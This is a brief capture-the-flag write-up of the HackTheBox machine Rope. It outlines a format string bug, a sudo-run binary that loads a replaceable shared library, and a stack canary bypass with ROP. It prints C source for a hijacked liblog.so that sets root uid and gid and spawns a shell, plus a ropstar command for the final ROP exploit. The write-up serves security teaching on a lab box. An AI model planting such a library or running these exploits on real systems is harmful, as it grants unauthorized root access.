Post

Rope @ HackTheBox

Posted
Preview Image
By xct
1 min read

Rope is a 50-point machine on HackTheBox that involves 3 binary exploits. There is a format string vulnerability in the boxes’s webserver and a replaceable shared library used by a binary we can run with sudo. Finally there is another binary where we have to bypass a stack canary and use ROP.

Notes

The user exploit.

Liblog.so:

1
2
3
4
5
6
7
8
9

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void printlog(){
    setuid(0);
    setgid(0);
    system("/bin/sh",NULL,NULL);
}

The root exploit.

Solving with ropstar:

1

python3 ~/tools/ropstar/ropstar.py -rhost localhost -rport 1337 -remote_offset ./contact

Thanks r4j for creating this fun box!

CTF
binary exploitation canary bruteforce format string rop
This post is licensed under CC BY 4.0 by the author.